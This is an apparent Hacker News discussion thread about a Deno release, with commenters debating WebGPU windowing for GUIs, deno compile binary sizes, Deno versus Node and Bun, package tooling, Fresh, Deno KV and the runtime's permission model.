With Slint [1] we're working on a framework which allow to make a desktop GUI in Javascript/Typescript, without bringing a browser/webview.
Currently, we do it by using binaries through napi-rs so we can bring in a window using the platform native API. And then we do some hack to merge the event loops.
But if Deno supports bringing up a window directly, this means we can just ship wasm instead of native binary for all platform. And also I hope event loop integration will be simplified.
Although we'd also need more API than just showing a window (mouse and keyboard input, accessibility, popup window, system tray, ...)
Big fan of custom rendering approaches, but wouldn't such a Design system sidestep any and accessibility tools? Nothing for screenreader to hook into. Text and interfaces would be neither native nor DOM based.
Hypocritically 'a11y' isn't very accessible for those of us who don't use the jargon.
Also, the first thing the project website (https://www.a11yproject.com) has to do is explain what the '11' stands for. So they must have some awareness of how inaccessible their name is.
i18n has been around for ever and makes sense since in code it’s a bit long. Then k8s, which never made sense to me. I don’t know if it’s appropriate to call it a trend, but I’ve seen people doing it more frequently.
The irony with this example is people with screen readers will hear something like “aEleveny” and it looks like “ally”.
People with screen readers are aware of acronyms even if they have poor vision, and it's unclear to me what the problem is, a11y has been around forever and in code it's a bit long.
Reading again, is the trend you detest...abbreviations that have a number representing letter count? Based on the existence of k8s and a11y?
I’m just stating my opinion that I find these abbreviations annoying, yes. They are so unintuitive that unless someone explicitly calls out what it’s abbreviating, you probably wouldn’t pick up on it (e.g. the MDN page for Accessibility) and just leaves people confused (like me!). I suspect there’s a reason AccessKit isn’t named `a11yKit`
Aren't a lot of abbreviations unintuitive until you learn what they mean?
Didn't we just have a thread the other day about the meaning of "MDN" - which also many people didn't know.
I see on this site "IMO" "FWIW" "IANAL" "TLDR" all the time. You generally can't tell what these mean either without looking them up or just knowing already because of them being so engrained in culture.
No it’s not the same, a11y creates a dissonance in the mind because part if it wants to see it as “ally”, the other part wants to see it as “A eleven Y” and the other part cringes and thinks its stupid.
This doesn't really seem related, it seems like you're saying "maybe we will use this, here is a link to our commercial GUI library".
Also why would you want to make a GUI even more bloated by integrating a browser to get webgpu and webasm (and why webgpu instead of just webGL?). That might be easy for library makers but why would someone want a giant library to make a GUI when they already have electron if they don't care about 350MB binaries to pop up a window.
What does it have to do with Deno and why do any of that to draw boxes and text on the screen? FLTK could do GUIs that took almost no CPU power starting with 100KB binaries 30 years ago.
People doing hardware accelerated GUIs have been using openGL for almost as long. This doesn't need to be a science project or a rabbit hole, drawing a GUI quickly is well worn territory.
FLTK and other libraries cannot be used from JavaScript.
JavaScript is one of the most popular programming language. But a JavaScript dev who needs to make a desktop GUI will usually need to use Electron to bring up a browser for the GUI. This means actually two JavaScript engine (Node and Chromium)
The reason it has to do with Deno is that you need a JavaScript/TypeScript runtime.
But you may not need a browser.
So you can develop your application in JavaScript using a framework that doesn't use the DOM but show a native window instead.
This is more lightweight and more secure (no risks of HTML injection and the browser is a big attack vector)
FLTK is permanently stuck in the 90s. It doesn't have full unicode support, right-to-left & bidirectional text, and doesn't support accessibility tools.
Not to mention that development has been stagnant for 15 years since it's flagship application (Nuke), was ported to QT.
Actually FLTK has full unicode support, right-to-left and bidi text.
The limiting factor is the OS.
For rtl and bidi, it depends on the OS. On linux for example, if FLTK is built with pango support, it'll support them just fine. On windows and macos, these work out of the box.
As for accessibility, the only thing missing is screen reader support. Otherwise tab navigation, ime and other modalities are supported.
FLTK's bindings in Rust provide an accesskit adapter which supports screen readers using the accesskit crate.
Someone has to first write bindings to the library using said FFI. This is not something most JavaScript dev can do. This has to be written by someone who knows C++ and JavaScript, and be good at both to understand all the details. (How the two interacts, how the lifetime of C++ objects play with the garbage collector, how do the inventloop mixes, ...)
Writing such binding is a huge work as they the whole API need to be wrapped. And sometimes concept from the one language don't map easily in the other. (eg. templates)
And then you still have to ship an extra binary in addition to Deno itself.
Right, but that's still a far cry from being entirely unable to use them together. And as for the extra binary, that's hardly an obstacle if you already have to ship Deno itself anyway (and that ain't even considering the possibility of statically-linking it into a custom Deno binary).
edit: i will not be taking this comment in good faith, i had a look through parents comments and it looks like they simply do not agree with Slint's approach to GUI programming: https://news.ycombinator.com/item?id=39223499#39229382
> What does it have to do with Deno
can we at least try to give people the benefit of the doubt instead of pretending like everyone is out to get you? if you read the change-log, it spells it out well:
> Our goal is to provide a windowing solution for WebGPU without linking to native windowing systems like X11
> This is a low level API that can be used by FFI windowing libraries like sdl2, glfw, raylib, winit and more to create a WebGPU surface using native window and display handles.
do you get it yet?
> People doing hardware accelerated GUIs have been using openGL for almost as long. This doesn't need to be a science project or a rabbit hole, drawing a GUI quickly is well worn territory.
i suggest talking to other graphics professionals to get a better understanding of why opengl is not _the_ solution. for a tldr[0]:
> regular OpenGL on desktops had Problems. So the browser people eventually realized that if you wanted to ship an OpenGL compatibility layer on Windows, it was actually easier to write an OpenGL emulator in DirectX than it was to use OpenGL directly and have to negotiate the various incompatibilities between OpenGL implementations of different video card drivers. The browser people also realized that if slight compatibility differences between different OpenGL drivers was hell, slight incompatibility differences between four different browsers times three OSes times different graphics card drivers would be the worst thing ever. From what I can only assume was desperation, the most successful example I've ever seen of true cross-company open source collaboration emerged: ANGLE, a BSD-licensed OpenGL emulator originally written by Google but with honest-to-goodness contributions from both Firefox and Apple, which is used for WebGL support in literally every web browser.
it looks like they simply do not agree with Slint's approach to GUI programming
My comment here is explaining exactly why I don't agree, no digging required.
Your quote is also about browsers implementing the webGL API, it has nothing to do with using basic openGL for GUIs, which again, is not required, because CPUs have been rendering GUIs for decades.
They're working on a project called Dioxus Blitz; from what I'm told, they're trying to implement a minimal browser target, that provides some basic DOM-like features and renders with wgpu.
It's not exactly what you're hoping for, but you might find common ground.
I totally get the idea of bringing JS into new environments because it is so ubiquitous. On the other hand, I hate the language and wish we could replace it in the browser, the opposite direction. I'd be much happier with ClojureScript or PureScript or something being the standard with the ecosystem to go with it.
Typescript takes away a significant amount of the pain for me; the only hold up after that was getting an environment set up to compile it. Deno supporting typescript without any configuration is incredible.
TypeScript is mostly additive, so all the footguns are still there if you aren't careful to avoid them. It also doesn't do anything about the extremely meager standard library that is inferior to what other mainstream PLs had 20+ years ago.
Would love to see the compile situation fixed - the generated executables are
~90MB+ at this stage and do now allow compression without erroring out. Deploying ala Golang is not feasible at that level but could well be down the line if this dev branch is picked up again!
Hi, Bartek from the Deno team here. We are actively looking into improving this situation and from initial investigations we were able to shave off roughly 40% of the baseline size, with more improvements possible in the future. Stay tuned for upcoming releases.
Tuned I am, happy to hear this is getting attention. Improvements in this domain would also enable Deno to be a more serious contender in the App space opened up via https://github.com/webui-dev/deno-webui and others.
Currently the generated binary is not static anyway, so you still need some parts of the system installed to run code. To be more precise, you can't use a "from scratch" container image base, but need to use something that at the very least has libgcc installed, such as the distroless "cc" image (gcr.io/distroless/cc).
I'm not sure using deno compile as a way of deploying to a controlled environment has much benefit anyway. Unlike some other languages/runtimes, only a single system dependency is really needed (a new-enough deno installation) to run your code
In my view, deno compile is more about shipping command line tools to people with all sorts of personal environments (which may not have deno at all)
I've been really happy with using Deno as a general scripting runtime... A shebang at the top and external dependencies are loaded to a shared path on run.
I do wish there was support for Linux distributions based on musl (Alpine) directly for smaller containers.
In general I like the Deno approach better than Node. Would be cool to see the UI tooling flushed out. A material or fluent based component library where Deno can be used like Flutter would be very cool indeed.
I'm not sure what your requirements are, but I've had a good amount of success with converting Node.js libraries to native libraries by embedding a CommonJS module into the binary, then running the actual code through QuickJS. Much smaller binaries.
If you really are pressed for space, you could use upx, or store 7z compressed code and embed the 7z library to decompress before passing it along to QuickJS.
Like I said, I wasn't sure of their requirements. I can say QuickJS is orders of magnitude easier to embed and understand than V8, which is why I adopted it for my use case.
When I download a modern game it's like 700GB so I donno why people complain about 100mb self contained deploys for javascript. Most of it is the international libraries anyway so.
I find it pretty ridicolous since I go to a website today and it's at least 15MB each time I refresh but 100MB on the server is a problem? Dude cmon.
So the fact that everything around is poorly made, forbids him from whining that a certain solution is as bad as everything else? Shouldn't we criticize and point out stuff that is bad, no matter whether it's as bad as something else? It's because of attitude like yours that we get 15mb of javascript on every website, 500gb games and UIs that take seconds to load.
Well my point is that it isn't that bad and there's a reason for it being ~100mb. You can throw out the Intl stuff and remove a large portion of that for example.
Modern games aren't 700Gb, there are a very few very large games. One of them is large on purpose to make to delete other games.
Updates for games are large because they aren't "just updated files", but a giant blob that can't be rearranged since it's optimized for loading order later.
Giant self-contained deploys like that are bad because their use case is CLI/GUI tools shipped to the end user. To give you context: my /usr/bin is ~900 binaries and total size is 109mb.
100MB at 1Gbps is ~0.8s to load. This especially sucks for FaaS and CI/CDs. This makes it difficult to use for on-demand use cases that are latency sensitive.
That and that's likely 100MB that's going to be competing for memory now* , in FaaS environments especially that's a ton of resources and you increase latency to load that especially over network storage. This also inflates container sizes and just becomes a pain in general.
*Server environments you often don't want to be using swap, and the OS will likely consider it high priority anyway.
I could only agree with you if you have a single monolithic server, don't use containers, don't need to distribute it to others, and don't frequently need to run a CI/CD pipeline. Only then are there not a ton of downsides to a 10mb vs 100mb executable.
> When I download a modern game it's like 700GB so I donno why people complain about 100mb self contained deploys for javascript.
People have been complaining about game sizes for years. "You complain about a 100GB game, I don't know why you also complain about a 100mb self-executable for a javascript runtime" doesn't really make sense.
Could be worse, could be Java. At least in terms of container size, cold start times and overhead at runtime. And I know there are options for AOT, etc. that are all more complex to configure than Deno build.
You download it to you game rig, not some cloud solution with limited resources to be paid for. Plus you may want to have more than one instance of service running.
I'm not using js, but that's not the point of a discussion.
And we were not talking about js, we were talking about Deno specifically. And about binary growing year to year notably.
>Pretty much all cloud services offers way more than that for free
More than what? The question is always about difference in %. The number of services\instances can grow faster than you can rewrite your conde in go\c++\rust of whatever (not to mention you will have to hire people for the task). And all of a sudden this x3-x4 difference matters.
This is whataboutism. Different sizes are acceptable for different people based on context. I worry about 10s of kilobytes for things I work on for instance.
Yes but there is a reason for it being 100mb. You get a self-contained app where you can get to write in javascript. You don't have to spend 100x the time in order to get the same app working in Rust.
If size is such a big deal, then don't use Deno, Node or Bun.
My issue is that most people that are working in restricted environments would never touch javascript since it's not well suited for those kinds of environments. People that complain tend to be haters that just want something to hate upon.
It used to be about php, now it's about javascript.
Your argument seems to be that those 100 Mb include the necessary libraries. The problem with this assertion is that much richer runtimes don't require that much. For example, a .NET Core console app published as self-contained is ~65 Mb, and it comes with more libraries than Deno.
You don't - that's the size of a completely self-contained binary, with .NET effectively baked in. A "hello world" .NET app that uses external runtime would be measured in kilobytes.
There are size limits when deploying on serverless or edge infrastructure so developers have to care about that. The providers also typically charge by compute seconds * memory consumed so a larger executable costs real money as well.
Some serverless use cases work like you say, but Docker-based options such as AWS ECS, Docker-based Lambda functions, or Kubernetes would all commonly make use of compiled options
I'm not a big fan of JavaScript but I admit I stayed away from it because I dislike nodejs and npm terribly.
I was forced to start coding again in JS some weeks ago and I wanted to try Deno. I must say it's been a very smooth and fast experience so far.
Very well done!
Can you comment on what you prefer about it? I find npm/js pretty smooth and the rough edges of Deno seem to kill the purported improvements at this point. That was just my gut-take several months ago and I was already steeped in the node/npm ecosystem so I'm curious about your perspective.
No Byzantine build config files,. As a start. Dependencies are downloaded to a shared location outside your project on demand instead of a separate npm install step.
TypeScript and esm/cjs usage without crazy syntax (writing modules, consuming cjs at least).
Lintinng and formatting in the box.
Can do shell scripts without package.json and nom install, just a shebang line at the top.
It's not the JavaScript runtime that's faster but the built-in APIs. Supposedly (I haven't tested this myself), Deno has faster implementations of many Node.js APIs, which I have seen reflected in benchmarks for things like throughput in an HTTP server.
Same with bun, it looks like node is leaving some performance on the table (maybe for backward compatibility or maybe because nobody bothered to improve it)
A ton of NodeJS modules are not part of V8 at all, like "fs" or "path" because those don't really make sense in a browser context. Basically everything that is not a W3C standard is probably not implemented in V8.
Like, for example, I recently found out that there are 3 separate ReadbleStream objects in NodeJS, one from "stream" (older one used in Request), one from "stream/web" (W3C standard, used by global.fetch()) and another one I forgot where it comes from. It doesn't help that two of them have the same name and you run into errors like "ReadableStream is not of type ReadableStream".
I assume the one from "stream/web" directly calls into V8 APIs because since it is a standard it would be implemented in V8 (it is used in the browser's window.fetch() after all). While the one from "stream" is built and maintained by NodeJS Foundation.
It is not really reasonable to expect the NodeJS Foundation to have enough resources to optimise all this modules to the max. And the W3C doesn't seem interested in building standards for server-side only things.
To add to this, a lot of those "W3C API" (most?) (to which I'll also add WHATWG API, like HTML5 - or fetch) have actually no relation to ECMAScript and thus aren't generally in v8 because they are not JavaScript.
Those API could be thought as from the "environment" in which JavaScript run. For example we often call web-only APIs "DOM API": `fetch`, `xmlHttpRequest` and so on.
Node.js also has its own environment. For example both `setTimeout` and `setInterval`, though present in both web and node.js, are implemented differently by browsers and node.js (it's just that node.js decided to go with roughly the same API - see below for code examples for both).
Taking requests as examples there are both declared in blink, the rendering engine and not v8 again because they aren't JS:
Good points, I always wondered why it took so long for NodeJS to support fetch() and WebSockets and other standard APIs. I thought those were part of V8, but I guess not!
NPM used to be reaaaaaallly bad due to lack of lockfiles and how it used to handle diamond dependencies
Added to the propencity of JS projects to have a ton of deps...
It has mostly been sorted out by all package managers. The node_modules debacle is still a hotly contested topic, it creates a lot of problems, but it also solves a lot of them compared to alternative approaches.
Then you have install performance which is mostly fine by now in all package managers, but if you really have problems with it you can use pnpm or yarn2.
As the python ecosystem grows and dependency trees move away from "django only" you can see they having the same types of problems that JS used to have.
We use Typescript for virtually everything at my place of work. Not so much because it's a great language for the a lot of the backend, and we do use some c++ for bottlenecks, but because it's so much more productive to use a single language when you're a small team. Not only can everyone help each other, we can also share resources between the front and the back end, and we've several in-house libraries to help us with things like ODATA querying and API's since there aren't really any public packages that are in anyway useful for that. I guess we probably should've gone with something other than ODATA, but since we use a lot of Microsoft graph APIs which despite their names are ODATA, it made sense at the time. We don't have trouble with Node or NPM, and when we onboard new people, the tend to step right into our setup and like it. Granted, we've done some pretty extensive and very opinionated skeleton projects that you have to use if you want to pass the first steps in our deployment pipeline. This took a little bit of effort, and it's still a team effort to keep our governance up to something we all agree on, but with those in place, I've found it's genuinely a nice way to work. An example of how strict we are is how you can't have your functions approved without return types and you certainly can't change any of the linting or Typescript configs. Similarly you can't import 3rd party NPM packages which aren't vetted first, and we have no auto-update on 3rd party packages with out a two week grace period and four sets of human eyes. I'm not going to pretend that a all of these choices are in anyway universal, but it's what we've come together and decided works for us.
Anyway you're certainly not alone in your opinion, but I think that a lot of the bad reputation with Node and NPM comes from the amount of "change management" you need to do to "limit" the vast amount of freedom the tools give you into something that will be workable for your team. Once you get there, however, I've found it to be a much to work with than things like Nuget and dotnet, requirements.txt and python, Cargo and Rust and a lot of others. I do have a personal preference for yarn, but I guess that's mostly for nostalgic reasons. I also very much appreciate that things like PiPy are going down what is similar to the NPM route.
I deployed my first non-trivial Deno app to production in 2023. There were some teething issues with learning to keep the lock file in sync, especially in a repo with multiple entry points each with separate lock files. Some of the granular permissions stuff didn't work how I expected, to the point where I almost gave up and just allowed network to/from all hosts. But overall the experience was good, and I have positive feelings towards Deno. I look forward to seeing where they take it.
Why Choose JSR?
A True TypeScript-First Environment: Efficient type checking and no transpilation hassles—write in TypeScript and deploy directly.
Performance and Usability at the Forefront: With integrated workspaces and seamless NPM integration, JSR puts usability first.
Secured and Accessible Modules: All modules in JSR are exposed over HTTPS, ensuring your code is always secure.
Open Source, Community-Driven: Built by developers, for developers, JSR is shaped by the real-world needs and contributions of the JavaScript community.
But they promoted they will not need one at any time, to extent they will never build one. There was only deno.land as a point to discover libraries or what community builds.
"Jupyter, the open source notebook tool, added support for JavaScript and TypeScript using Deno. This means data science, visualization, and more can all be done using modern JavaScript and TypeScript and web standards APIs."
I love this! At the same time, who would want to do this, given Python's excellent support for numbers and mathematics? And what about Haskell?
The people who already know JS/TS and would like to occasionally do something interesting with a piece of data.
With Python, most of my time goes into googling how that list filtering / mapping syntax went again or some other basic level stuff that I do every day with JS. I know Python, but I'm not fluent in it. And I will likely never be fluent in it, because my Python use cases are so infrequent.
Maybe you want to share examples of how to do things in TypeScript using a notebook? Although, Observable [1] is another way to do that, for JavaScript at least.
Deno is such a great project. I would love to see greater support for embedding it into a Rust host process.
I'm writing a JavaScript bundler and need a Node.js runtime to execute plugins. Deno's executable has fantastic Node support (at least, good enough for my use case) however the deno-core crate is super barebones and difficult to embed.
At this stage I can't simply add the deno runtime into my Rust application, I need to copy/paste internal crates from the Deno executable and wire them up myself (without documentation on how).
I'd love to see expansion for my use case - Deno could become the "plugin runtime" for the JS tooling world if it had a nice embed story.
Right now I am just going with a Nodejs child process that I talk to from the Rust host process using stdio. In my tests, the stdio approach has 10x the communication latency when compared to an embedded Deno runtime (that adds ~1 second per round trip message in a project with 100k assets)
They’re operating like a startup, which like you say should be perfectly fine. Can’t pretend like a giant when you don’t have the bank account for that.
Though they’re also selling a developer ecosystem. A lock-in. Are you willing to bet your company’s own software tools on a vendor that could go bankrupt from their other (hosting) business? The question is if Deno hosting dies, will Deno as a platform still thrive?
I think by now accusations of lock-in are a bit shaky. They're providing self-hosted alternatives for all the features of their ecosystem (and it's all open-source anyway).
If anyone from Supabase is reading here, your main marketing page still says Edge Functions run on 29 regions. Since they run off of Deno Deploy, it seems like this needs updating.
thanks - will update. It is actually hosted on our own side but I don’t think we are in 29 regions and clearly forgot to update this when we migrated. I’ll figure out the exact number and create a PR
I'd love to use Fresh but a framework for web development which calls itself v1.x and yet only supports Tailwind for styling purposes feels very immature.
The fact that for the next iteration they are prioritizing view transitions and not CSS bundling is baffling.
if I want to use any modern styling solution (CSS modules, Vanilla Extract, Panda, any CSS-in-JS...) a bit of collaboration by the bundler is needed. I can generate CSS file(s) in any way I like but I would have zero integration with the templates
all CSS-in-JS or styling solutions that allow for component scoping require some kind of bundling or otherwise interaction for the bundler. It's true most people don't need it, but most people don't need 90% of what Fresh offers, surely?
Deno wasn't originally designed to be node compatible, but I think they realized nobody would want to switch to it because node is so prevalent already...
I think the main appeal of projects like Bun and Deno is the built-in tooling for building/bundling modern typescript applications without requiring dozens of dependencies for even a basic hello world app.
If node.js decided to include functionality similar to what is available on Bun/Deno, both projects would probably lose traction quickly.
that feels like a really weak value prop to me. how often do you have to install that stuff? how hard is it actually? can you really not use, e.g. for react, the typical vite starter and it's done?
The other side of it is if you want to distribute your code not as a server. If you write a CLI in Node + TS + ... then it might be pretty fiddly for someone to clone that repo and get it running locally. You'll certainly have to document exactly what's needed.
Whereas with Deno you can compile to a single binary and let them install that if they trust you. Or they can `deno install https://raw.githubusercontent.com/.../cli.ts`, or clone the repo and just run `deno task install` or `deno task run`. For those they need to install Deno, but nothing else.
> then it might be pretty fiddly for someone to clone that repo and get it running locally
with node + TS, it is straightforward (and common) to generate JS output at publish time for distribution. then, using the CLI tool or whatever is only a `npm install -g <pkg>` away, no extra steps.
sure it's not a single binary, but I'd argue _most_ users of a general CLI utility don't necessarily care about this.
So Deno is better at small scripts written in Typescript than Node. Then, the question becomes, if you're going to have Deno installed and if it works well enough to replace Node, why keep Node?
then you have to define "works well enough to replace Node"
i was excited about bun too, until v1's "drop-in node replacement"
that was in no way a drop-in node replacement. using that would be the fastest way to kill a business with its terrible bugs and rough edges.
i used to be really excited about deno, but now i think the tradeoffs aren't going to be worth it for mass adoption. i sometimes write servers in go. now that i have go installed, should i use it for all my servers? no, it's just another tool with different trade-offs. most times, node will suit my project better.
> can you really not use, e.g. for react, the typical vite starter and it's done?
I have to install that stuff everytime I'm starting a new project, switching to a new project, or creating a one-off script.
It's hard when creating a new project where there's always at least one flag that needs to be found and set different from a previous project for some random reason, every single time.
It's hard when switching to a new project, because you have to figure out which version of node you're supposed to be running because each version runs the dependencies differently between different versions of node, and different computers. It might even silently work for you without being on the right version, meaning you continue working on it, then your commits don't work for yourself later or others now or later. This leads to one of two possibilities:
1. A longer job either unwinding everything to figure out what the versions should have been the whole time.
2. A lot of trial and error with version numbers in the package and lock files trying to figure out which set of dependencies work for you, work for others, and don't break the current project.
We also can't use the typical community templates because they always become unmaintained after 2 years or so.
---------------------------
Why I like Deno:
- Stupid easy installation (single binary) with included updater
- Secure by default
- TS out of the box (including in repl making one-off-scripts super easy to get started)
- Settings are already correct by default.
-- and if you ever need to touch settings for massive projects, they all sit in one file, so no more: tsconfig/package.json/package-lock/yarnlock/prettier/babel/eslintrc/webpack/etc... And since the settings are already sensible by default, you only need to provide overrides, not the entire files, so the end result for a complex project is usually small (example link: https://docs.deno.com/runtime/manual/getting_started/configu...)
- Comes with builtin STD meaning I don't need to mess-around with dependencies
- Builtin utilities are actually good so I don't need to mess-around with the rest of the ecosystem. No jest/vitest, no webpack/rollup, no eslint/prettier/biome (but you can keep using your editor versions just fine).
- Since it came after the require -> import transition, basically everything you're going to be doing is already using the more sensible es modules.
Except they are playing catch up with what Microsoft says Typescript is supposed to mean.
I rather have pure JavaScript, or use the Typescript from source, without having to figure out if a type analysis bug is from me, or the tool that is catching up to Typescript vlatest.
Not sure what modern typescript means, but you only need one or two dependendencies (esbuild and tsc) unless you are doing something more involved, in which case deno alone might not work either.
OTOH the ways that you can improve upon node's shortcomings while staying compatible with it are limited. Bun is taking the pragmatic approach of providing fast drop-in replacements for node, npm and other standard tools, while Deno was the original creator of node going "if I started node today, what would I do differently?". So, different approaches...
I’ve used Jupyter notebooks with deno decently. They seem much better than Python Jupyter notebooks because of the lack of pain around dependency management.
I deployed 3 projects on Deno last year and I'm planning on launching 2 websites in the next couple of months. Mix of personal projects and some for clients.
Deno Deploy just works, albeit the cold start can be slow but I'm now using an hybrid setup with Fresh routes backed by a CDN.
The dev experience is great. I've used a couple of other solutions similar (Next, Nuxt and vite-ssr-plugin) and I sometimes I need to do somethings manually that would already exist on other platforms but in the end my projects stay simpler.
Deno has also created a Next.js competitor, Fresh. I found it a few weeks ago and am starting to go through the docs, looks like a good overall concept. https://fresh.deno.dev/
I actually found this worrying, since it means they are not committed to make NextJS work nicely, quite the opposite they now have incentive to not make it happen
Even if Vercel was built on Deno, I don't see them open sourcing that. Everything that manages distributed cache, edge rendering... They'd probably rather keep that closed and available only for Vercel customers.
The NextJS team should be working on making NextJS run better with Deno, not the other way around. If the NextJS team doesn't want to do the heavy lifting with that support, thats on them. I think its perfectly reasonable that the Deno folks have an approximate alternative to NextJS. After all, NextJS won't use native Deno idioms for example, it'll always be tied to Vercels' proprietary cloud infrastructure.
Deno has members in Ecma TC39, so they take part in the development and standardization of JS.
Deno brings a new mentality to development focused on simplifying things, whereas Bun aims to be an improved Node.
Deno aligns with web APIs: you can use the same APIs in the browser and in Deno. Many packages work in both platforms. Deno is even in the compatibility tables in MDN.
Deno simplifies DX greatly. It's very easy to work with Deno. Easy to install things and set up a project, easy to deploy, no config files etc.
Deno is written in Rust, which allows them to move faster and more safely. Contributing to and extending Deno is a breeze. You can add Rust crates to the runtime and use them from JS.
I feel like the Bun team has been too pressured by executives and marketing. They announced 1.0 when Bun was clearly not stable enough, giving lots of segfaults. Even their readme had a huge statement right in the beginning saying that Bun was not production ready yet, despite 1.0 being hyped all over the place.
> Deno is written in Rust, which allows them to move faster and more safely. Contributing to and extending Deno is a breeze. You can add Rust crates to the runtime and use them from JS.
Pick your horse to bet on. They both have great teams behind them. Bun (written in Zig) claims higher performance. It looks promising but independent tests have yet to validate these claims.
They also kinda have different goals. Bun seeks to be more of a drop-in replacement from Node whereas Deno, being spearheaded by the same person who made Node, seeks to move the industry forward and fix mistakes Deno made. However Deno, out of necessity, has also highly valued backwards compatibility with the Node ecosystem
It's a weird scenario. You have node which is entrenched, feature-rich, and stable although not perfect. Then you have two runtimes/ecosystems trying to optimize on that but in slightly different ways. I love it but I feel like there is barely room for even one. It's just incredible there is so much work being put forth into moving the needle maybe an extra 20% on the existing node/npm status quo.
> Deno, being spearheaded by the same person who made Node, seeks to move the industry forward and fix mistakes Deno (I assume you mean Node.js) made.
If they aren't able to evolve Node.js to overcome the mistakes (e.g. because they're technical in nature, or momentum of install base, or they don't have the leadership ability), I am worried that they might repeat the same pattern with Deno, since it isn't possible to NOT make any mistakes.
OTOH, having a clean slate that's learned from mistakes and you can bring a lot of your code along doesn't seem like a major impediment.
Is code written for any of the 3 runtimes generally transferrable? I realize some won't (e.g. Deno has WebGPU support, which is attractive to me), but generally?
The main difference is that Deno was thought to evolve hand in hand with browsers since the beginning. Node followed its own way and fragmented the JS ecosystem. It got to a point where it was basically impossible to realign Node's direction without breaking everyone's codebase. Mistakes will be made in Deno, but the direction of the project now takes into account the ecosystem as a whole.
I still haven't figured out how to bring in a deno "app", a cli tool, into an air-gapped environment. There is literally zero docs and everything assumes you are connected to the internet. The whole thing is too magical, and has no hope in the corporate world.
It is interesting to me that none of the new NodeJS alternatives support multithreading. Why is that?
Is it just a side-effect of using V8 engine for the heavy lifting, or is it some part of the ECMAScript specification which forbids multithreaded implementations of the language?
Cons: All your async code becomes full of data races.
I suppose adding multithreading to the Node ecosystem would be as hard (if not harder) than removing GIL from Python. At least Python has locking primitives. Node, as far as I know, has none.
Haven't deployed it yet, but the API seems decent when doing local development.
It's a bit low-level compared to a SQL database; you're building your own indexes and need to write transactions to update them atomically along with the main record. (But it does have transactions, so it's reasonable.) It reminds me of App Engine datastore, back in the day.
There are some fairly tight limits. (64k for records.) I wouldn't use it for storing images or larger files.
Not sure what I'm going to do for full-text search. But I've built simple search engines from scratch before.
I know it sound silly but I love the aesthetic behind Deno's brand, it makes me want to use it for one project or another. Node.js is so old now. it's reliable but boring. I want something new, bold, and daring. Node.js is not it, although it was ~11 years ago. It's interesting how our views change.
This does indeed sound silly. If people were to use proper arguments to select technology, we wouldn't be in this mess in the first place. Unfortunately, most of us are more susceptible towards aesthetics, novelty, and admiration of self-proclaimed software gurus. Thanks for being open about this and sharing.
It would have been nice if I had realized this aspect of technological evolution earlier in my career. I might have spent more time learning about marketing than about the actual technology.
Yeah.. It's become a cliché that web developers, especially in the JavaScript ecosystem, are always chasing after what's "new and shiny". This leads to constant churn, new frameworks and libraries that reinvent the wheel, endless stuff to learn and catch up. It gets tiring after a while.
So the old-timers remind us, "Choose boring technology." Reliable and boring is a good thing.
On the other hand, I recently started learning Bun, and oh what a breath of fresh air, it makes things fun again. I love that its codebase is so readable and small still, and everything is freshly designed with the insights of experience and hindsight. It doesn't have the accumulated cruft, years of decisions and compromises.
So, sometimes it's great to shed the old and grow with the new generation.
I like it too . I even liked the old website better than the current one. It was more colorful and fancy.
Brand reflects a project's philosphy. Deno is thought to be easy and simple, and the "childish" branding reflects that.
So you may not be wrong at all in your criteria. Subjective human communication can be more effective than objective communication sometimes ;). It just works at a different level.
Are there any libraries or frameworks to facilitate writing code that accesses things like the filesystem and network, but also works in Node, Deno, and Bun (bunodeno)?
I have a deno app in production and it is working just fine. However, I still think node is superior when you self host when you are not using docker. Deno afaik still doesn't support any way of running one process for every CPU like the cluster module in Node.js.
I like to run my shit on the metal and without Docker and it feels like Deno was designed to run on Docker or some other kind of virtual containerized environment.
However, you can run it on node thanks to pm2, but I guess why even run on Deno in the first place?
OTOH Deno can produce self-contained binaries. For me this is a plus, it makes distribution so much easier. I don't care if it's 100MB, I just want to have one file which I can throw on my server,
To be fair to the original commenter I believe they were making a Mean Girls (2004) reference. The line in question is "Stop trying to make fetch happen. It's not going to happen.". Likely just a funny quip and nothing serious :)
Yes, and that’s actually the problem with the comment. HN guidelines are for substantive discussions, not funny quips. There’s a few HN comment guidelines [1] that could apply here, but the most directly applicable one is “Omit internet tropes.”
It's both a throwaway quip, and a real sentiment: I think that Deno is not getting any traction, surely not the intended traction expected when it was created (and by Node's creator no less), and it will just keep hanging on in the fringe.
Besides, it wouldn't hurt HN to loosen up a little once in a while. You know, obsessive total adherence to rules is never a good thing - even to the law.
Interestingly, Deno and Node were both originally developed by the same person, Ryan Dahl.
Why did he feel the need to build a competitor to his own product? Whatever features are supposed to make Deno "better" than Node...why didn't he just work on integrating them into Node?
I understand that sometimes changes to software can be infeasible, especially if they are large fundamental/foundational changes, but this is still a bit of a head scratcher to me.
Not all software is shipped using containers. For example, with Deno, you can compile your application into a single executable binary. By having permissions built into the runtime, this means you can import a third-party package but only allow network requests to go to specific URLs; this way, even if malicious code is referenced in the app, it can't phone home.
Why? `--allow-all` is the epitome of trivial. You can even wrap the deno executable in a script that passes that to it every time if that's what you really need.
With Slint [1] we're working on a framework which allow to make a desktop GUI in Javascript/Typescript, without bringing a browser/webview. Currently, we do it by using binaries through napi-rs so we can bring in a window using the platform native API. And then we do some hack to merge the event loops.
But if Deno supports bringing up a window directly, this means we can just ship wasm instead of native binary for all platform. And also I hope event loop integration will be simplified.
Although we'd also need more API than just showing a window (mouse and keyboard input, accessibility, popup window, system tray, ...)
[1] https://slint.dev
Edit: I got excited a bit too early. The WebGPU feature doesn't include the API to launch a Window. One still need to rely on an extra library binary.